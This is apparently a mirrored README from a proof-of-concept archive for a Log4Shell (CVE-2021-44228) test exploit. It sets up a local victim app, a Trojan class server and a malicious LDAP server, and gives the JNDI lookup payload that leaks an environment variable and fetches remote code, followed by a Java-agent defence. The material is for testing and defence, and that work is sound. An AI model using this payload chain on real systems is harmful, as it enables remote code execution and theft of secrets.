关联漏洞
描述
Test exploit of CVE-2021-44228
介绍
# Test exploit of CVE-2021-44228 (log4shell)
### Preparation
```shell
# Install Nodejs HTTP server
npm -g i http-server
# Build victim app
cd victim-app
mvn install
# Compile Trojan
cd test-trojan
javac Trojan.java
# Build marshalsec (required Java 8)
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
# Build log4j-jndi-be-gone
git clone git@github.com:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew
```
### Start the HTTP server hosting a Trojan payload
```shell
cd test-trojan
http-server .
```
### Start a malicious LDAP server
See https://github.com/mbechler/marshalsec
```shell
cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"
```
### Watch for exploit events (optional)
useful in cases when stderr is hidden
```shell
watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'
```
### Exploit
##### Explanation
The victim application logs the following string via a vulnerable `log4j2` library (version 2.14.1)
```java
log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");
```
executing two vectors of attacks simultaneously:
1. Sniffing environment variables (`$USER` in this example), that can be viewed in the _marshalsec_ LDAP server output
```
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
```
2. Download and execute malicious code that logs the message `!!! BUSTED !!!` to the victim's app standard error stream,
as well as creates an empty `/tmp/log4shell-BUSTED-*` file.\
For this attack to work the following JVM option must be enabled on the victim server:
```properties
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
```
##### Execution
```shell
cd victim-app
# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar
# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/
```
### Defence
See: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support
```shell
java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar
```
### System-wide defence
Replace all `java` binaries with the script below:
`java.guarded`
```shell
#!/bin/bash
$(dirname "$0")/java.original "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"
```
Example:
```shell
cd $(dirname $(which java))
sudo su
mv java java.original
cp java.guarded java
```
文件快照
[4.0K] /data/pocs/def13006638ff8a1d146847bc201b181a0830d14
├── [1.0K] LICENSE
├── [2.7K] README.md
├── [4.0K] test-trojan
│ ├── [1.7K] Trojan.class
│ └── [ 940] Trojan.java
└── [4.0K] victim-app
├── [4.0K] core
│ ├── [1.0K] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] my
│ └── [4.0K] app
│ ├── [ 362] Main.java
│ └── [ 976] MainWrapper.java
├── [4.0K] fatjar
│ └── [2.9K] pom.xml
├── [ 675] pom.xml
└── [4.0K] web
├── [1.1K] pom.xml
└── [4.0K] src
└── [4.0K] main
└── [4.0K] webapp
├── [ 193] index.jsp
└── [4.0K] WEB-INF
└── [ 307] web.xml
14 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。